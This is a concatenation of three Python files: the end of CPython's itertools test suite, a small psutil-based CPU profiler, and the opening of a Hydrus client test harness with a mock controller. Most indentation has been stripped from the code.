self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
    def test_starmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_pairwise(self):
a = []
self.makecycle(pairwise([a]*5), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
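# Helper iterables for TestVariousIteratorArgs below: R/G/I/Ig/L are well-behaved
# sequences and iterators, while X, N, E and S deliberately misbehave (no iteration
# protocol, missing __next__, raising mid-iteration, immediate StopIteration).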
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_pairwise(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
seq = list(g(s))
expected = list(zip(seq, seq[1:]))
actual = list(pairwise(g(s)))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, pairwise, X(s))
self.assertRaises(TypeError, pairwise, N(s))
self.assertRaises(ZeroDivisionError, list, pairwise(E(s)))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
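# repeat() with a finite count exposes its remaining length via __length_hint__().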
class LengthTransparency(unittest.TestCase):
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
def test_keywords_in_subclass(self):
# count is not subclassable...
testcases = [
(repeat, (1, 2), [1, 1]),
(zip, ([1, 2], 'ab'), [(1, 'a'), (2, 'b')]),
(filter, (None, [0, 1]), [1]),
(filterfalse, (None, [0, 1]), [0]),
(chain, ([1, 2], [3, 4]), [1, 2, 3]),
(map, (str, [1, 2]), ['1', '2']),
(starmap, (operator.pow, ((2, 3), (3, 2))), [8, 9]),
(islice, ([1, 2, 3, 4], 1, 3), [2, 3]),
(takewhile, (isEven, [2, 3, 4]), [2]),
(dropwhile, (isEven, [2, 3, 4]), [3, 4]),
(cycle, ([1, 2],), [1, 2, 1]),
(compress, ('ABC', [1, 0, 1]), ['A', 'C']),
]
for cls, args, result in testcases:
with self.subTest(cls):
class subclass(cls):
pass
u = subclass(*args)
self.assertIs(type(u), subclass)
self.assertEqual(list(islice(u, 0, 3)), result)
with self.assertRaises(TypeError):
subclass(*args, newarg=3)
for cls, args, result in testcases:
# Constructors of repeat, zip, compress accept keyword arguments.
# Their subclasses need overriding __new__ to support new
# keyword arguments.
if cls in [repeat, zip, compress]:
continue
with self.subTest(cls):
class subclass_with_init(cls):
def __init__(self, *args, newarg=None):
self.newarg = newarg
u = subclass_with_init(*args, newarg=3)
self.assertIs(type(u), subclass_with_init)
self.assertEqual(list(islice(u, 0, 3)), result)
self.assertEqual(u.newarg, 3)
for cls, args, result in testcases:
with self.subTest(cls):
class subclass_with_new(cls):
def __new__(cls, *args, newarg=None):
self = super().__new__(cls, *args)
self.newarg = newarg
return self
u = subclass_with_new(*args, newarg=3)
self.assertIs(type(u), subclass_with_new)
self.assertEqual(list(islice(u, 0, 3)), result)
self.assertEqual(u.newarg, 3)
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
def load_tests(loader, tests, pattern):
tests.addTest(doctest.DocTestSuite())
return tests
if __name__ == "__main__":
unittest.main()
|
profiler.py
|
import os
import psutil
import multiprocessing as mp
import numpy as np
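# Singleton helper that runs a target function in a child process and samples
# per-core CPU utilisation with psutil for the duration of the run, plus a short
# baseline window before and after it.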
class Profiler:
__instance = None
@staticmethod
def get_instance():
if Profiler.__instance is None:
Profiler.__instance = Profiler()
return Profiler.__instance
def execute(self, *args):
target_function = args[0]
params = args[1][0]
pipe_end = args[2]
result = target_function(*params)
pipe_end.send(result)
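    # Sample per-core CPU percentages at roughly `freq` Hz while `target_function(*args)`
    # runs in a separate process; returns (target result, timestamps, column labels, samples).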
def profile_cpu(self, freq, target_function, *args):
data_points = []
columns = []
values = []
interval = 1/freq
for i in range(mp.cpu_count()):
columns.append("cpu (" + str(i) + ")")
recv_end, send_end = mp.Pipe(False)
exe_context = []
exe_context.append(target_function)
exe_context.append(args)
exe_context.append(send_end)
        for i in range(30):  # warm-up: 30 baseline samples (30/freq seconds) before starting the target
values.append(psutil.cpu_percent(interval, percpu=True))
target_process = mp.Process(target=self.execute, args=exe_context)
target_process.start()
psutil_process = psutil.Process(target_process.pid)
while target_process.is_alive():
values.append(psutil.cpu_percent(interval, percpu=True))
target_process.join()
        for i in range(30):  # cool-down: 30 more samples (30/freq seconds) after the target exits
values.append(psutil.cpu_percent(interval, percpu=True))
for i in range(len(values)):
data_points.append(str(round(i * interval, 2)) + "s")
target_result = recv_end.recv()
return target_result, data_points, columns, values
if __name__ == "__main__":
def test_func(a, b, c):
result = []
for i in range(50000):
result.append(a + b + c + i)
return result
profiler = Profiler.get_instance()
res, dps, columns, values = profiler.profile_cpu(100, test_func, [1, 2, 3])
print(dps, columns, values)
|
test.py
|
#!/usr/bin/env python2
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
from include import HydrusConstants as HC
from include import ClientConstants as CC
from include import HydrusGlobals as HG
from include import ClientDefaults
from include import ClientNetworking
from include import ClientNetworkingBandwidth
from include import ClientNetworkingDomain
from include import ClientNetworkingLogin
from include import ClientNetworkingSessions
from include import ClientServices
from include import ClientThreading
from include import HydrusExceptions
from include import HydrusPubSub
from include import HydrusSessions
from include import HydrusTags
from include import HydrusThreading
from include import TestClientConstants
from include import TestClientDaemons
from include import TestClientData
from include import TestClientListBoxes
from include import TestClientNetworking
from include import TestConstants
from include import TestDialogs
from include import TestDB
from include import TestFunctions
from include import TestClientImageHandling
from include import TestHydrusNATPunch
from include import TestHydrusNetworking
from include import TestHydrusSerialisable
from include import TestHydrusServer
from include import TestHydrusSessions
from include import TestHydrusTags
import collections
import os
import random
import shutil
import sys
import tempfile
import threading
import time
import traceback
import unittest
import wx
from twisted.internet import reactor
from include import ClientCaches
from include import ClientData
from include import ClientOptions
from include import HydrusData
from include import HydrusPaths
only_run = None
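# Test-harness controller: it stands in for the real client/server controllers,
# serving canned data for Read() calls and recording Write() calls, so the test
# modules can run without a live database, network or full GUI session.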
class Controller( object ):
def __init__( self ):
self.db_dir = tempfile.mkdtemp()
TestConstants.DB_DIR = self.db_dir
self._server_files_dir = os.path.join( self.db_dir, 'server_files' )
self._updates_dir = os.path.join( self.db_dir, 'test_updates' )
client_files_default = os.path.join( self.db_dir, 'client_files' )
HydrusPaths.MakeSureDirectoryExists( self._server_files_dir )
HydrusPaths.MakeSureDirectoryExists( self._updates_dir )
HydrusPaths.MakeSureDirectoryExists( client_files_default )
HG.controller = self
HG.client_controller = self
HG.server_controller = self
HG.test_controller = self
self.gui = self
self._call_to_threads = []
self._pubsub = HydrusPubSub.HydrusPubSub( self )
self.new_options = ClientOptions.ClientOptions( self.db_dir )
HC.options = ClientDefaults.GetClientDefaultOptions()
self.options = HC.options
def show_text( text ): pass
HydrusData.ShowText = show_text
self._reads = {}
self._reads[ 'hydrus_sessions' ] = []
self._reads[ 'local_booru_share_keys' ] = []
self._reads[ 'messaging_sessions' ] = []
self._reads[ 'tag_censorship' ] = []
self._reads[ 'options' ] = ClientDefaults.GetClientDefaultOptions()
self._reads[ 'file_system_predicates' ] = []
self._reads[ 'media_results' ] = []
self.example_tag_repo_service_key = HydrusData.GenerateKey()
services = []
services.append( ClientServices.GenerateService( CC.LOCAL_BOORU_SERVICE_KEY, HC.LOCAL_BOORU, CC.LOCAL_BOORU_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.COMBINED_LOCAL_FILE_SERVICE_KEY, HC.COMBINED_LOCAL_FILE, CC.COMBINED_LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.LOCAL_FILE_SERVICE_KEY, HC.LOCAL_FILE_DOMAIN, CC.LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.TRASH_SERVICE_KEY, HC.LOCAL_FILE_TRASH_DOMAIN, CC.LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.LOCAL_TAG_SERVICE_KEY, HC.LOCAL_TAG, CC.LOCAL_TAG_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( self.example_tag_repo_service_key, HC.TAG_REPOSITORY, 'example tag repo' ) )
services.append( ClientServices.GenerateService( CC.COMBINED_TAG_SERVICE_KEY, HC.COMBINED_TAG, CC.COMBINED_TAG_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( TestConstants.LOCAL_RATING_LIKE_SERVICE_KEY, HC.LOCAL_RATING_LIKE, 'example local rating like service' ) )
services.append( ClientServices.GenerateService( TestConstants.LOCAL_RATING_NUMERICAL_SERVICE_KEY, HC.LOCAL_RATING_NUMERICAL, 'example local rating numerical service' ) )
self._reads[ 'services' ] = services
client_files_locations = {}
for prefix in HydrusData.IterateHexPrefixes():
for c in ( 'f', 't', 'r' ):
client_files_locations[ c + prefix ] = client_files_default
self._reads[ 'client_files_locations' ] = client_files_locations
self._reads[ 'sessions' ] = []
self._reads[ 'tag_parents' ] = {}
self._reads[ 'tag_siblings' ] = {}
self._reads[ 'in_inbox' ] = False
self._writes = collections.defaultdict( list )
self._managers = {}
self.services_manager = ClientCaches.ServicesManager( self )
self.client_files_manager = ClientCaches.ClientFilesManager( self )
self.parsing_cache = ClientCaches.ParsingCache()
bandwidth_manager = ClientNetworkingBandwidth.NetworkBandwidthManager()
session_manager = ClientNetworkingSessions.NetworkSessionManager()
domain_manager = ClientNetworkingDomain.NetworkDomainManager()
login_manager = ClientNetworkingLogin.NetworkLoginManager()
self.network_engine = ClientNetworking.NetworkEngine( self, bandwidth_manager, session_manager, domain_manager, login_manager )
self.CallToThreadLongRunning( self.network_engine.MainLoop )
self._managers[ 'tag_censorship' ] = ClientCaches.TagCensorshipManager( self )
self._managers[ 'tag_siblings' ] = ClientCaches.TagSiblingsManager( self )
self._managers[ 'tag_parents' ] = ClientCaches.TagParentsManager( self )
self._managers[ 'undo' ] = ClientCaches.UndoManager( self )
self.server_session_manager = HydrusSessions.HydrusSessionManagerServer()
self.local_booru_manager = ClientCaches.LocalBooruCache( self )
self._cookies = {}
self._job_scheduler = HydrusThreading.JobScheduler( self )
self._job_scheduler.start()
def _GetCallToThread( self ):
for call_to_thread in self._call_to_threads:
if not call_to_thread.CurrentlyWorking():
return call_to_thread
if len( self._call_to_threads ) > 100:
raise Exception( 'Too many call to threads!' )
call_to_thread = HydrusThreading.THREADCallToThread( self, 'CallToThread' )
self._call_to_threads.append( call_to_thread )
call_to_thread.start()
return call_to_thread
def _SetupWx( self ):
self.locale = wx.Locale( wx.LANGUAGE_DEFAULT ) # Very important to init this here and keep it non garbage collected
CC.GlobalBMPs.STATICInitialise()
self.frame_icon = wx.Icon( os.path.join( HC.STATIC_DIR, 'hydrus_32_non-transparent.png' ), wx.BITMAP_TYPE_PNG )
def pub( self, topic, *args, **kwargs ):
pass
def pubimmediate( self, topic, *args, **kwargs ):
self._pubsub.pubimmediate( topic, *args, **kwargs )
def sub( self, object, method_name, topic ):
self._pubsub.sub( object, method_name, topic )
def AcquirePageKey( self ):
return HydrusData.GenerateKey()
def CallBlockingToWx( self, func, *args, **kwargs ):
def wx_code( job_key ):
try:
result = func( *args, **kwargs )
job_key.SetVariable( 'result', result )
except HydrusExceptions.PermissionException as e:
job_key.SetVariable( 'error', e )
except Exception as e:
job_key.SetVariable( 'error', e )
HydrusData.Print( 'CallBlockingToWx just caught this error:' )
HydrusData.DebugPrint( traceback.format_exc() )
finally:
job_key.Finish()
job_key = ClientThreading.JobKey()
job_key.Begin()
wx.CallAfter( wx_code, job_key )
while not job_key.IsDone():
if HG.model_shutdown:
raise HydrusExceptions.ShutdownException( 'Application is shutting down!' )
time.sleep( 0.05 )
if job_key.HasVariable( 'result' ):
# result can be None, for wx_code that has no return variable
result = job_key.GetIfHasVariable( 'result' )
return result
error = job_key.GetIfHasVariable( 'error' )
if error is not None:
raise error
raise HydrusExceptions.ShutdownException()
def CallToThread( self, callable, *args, **kwargs ):
call_to_thread = self._GetCallToThread()
call_to_thread.put( callable, *args, **kwargs )
CallToThreadLongRunning = CallToThread
def CallLater( self, initial_delay, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = HydrusThreading.SchedulableJob( self, self._job_scheduler, initial_delay, call )
self._job_scheduler.AddJob( job )
return job
def CallLaterWXSafe( self, window, initial_delay, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = ClientThreading.WXAwareJob( self, self._job_scheduler, window, initial_delay, call )
self._job_scheduler.AddJob( job )
return job
def CallRepeating( self, initial_delay, period, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = HydrusThreading.RepeatingJob( self, self._job_scheduler, initial_delay, period, call )
self._job_scheduler.AddJob( job )
return job
def CallRepeatingWXSafe( self, window, initial_delay, period, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = ClientThreading.WXAwareRepeatingJob( self, self._job_scheduler, window, initial_delay, period, call )
self._job_scheduler.AddJob( job )
return job
def DBCurrentlyDoingJob( self ):
return False
def GetFilesDir( self ):
return self._server_files_dir
def GetNewOptions( self ):
return self.new_options
def GetManager( self, manager_type ):
return self._managers[ manager_type ]
def GetWrite( self, name ):
write = self._writes[ name ]
del self._writes[ name ]
return write
def IsBooted( self ):
return True
def IsCurrentPage( self, page_key ):
return False
def IsFirstStart( self ):
return True
def IShouldRegularlyUpdate( self, window ):
return True
def ModelIsShutdown( self ):
return HG.model_shutdown
def PageAlive( self, page_key ):
return False
def PageClosedButNotDestroyed( self, page_key ):
return False
def Read( self, name, *args, **kwargs ):
return self._reads[ name ]
def RegisterUIUpdateWindow( self, window ):
pass
def ReleasePageKey( self, page_key ):
pass
def ReportDataUsed( self, num_bytes ):
pass
def ReportRequestUsed( self ):
pass
def ResetIdleTimer( self ): pass
def Run( self ):
self._SetupWx()
suites = []
if only_run is None: run_all = True
else: run_all = False
# the gui stuff runs fine on its own but crashes in the full test if it is not early, wew
# something to do with the delayed button clicking stuff
if run_all or only_run == 'gui':
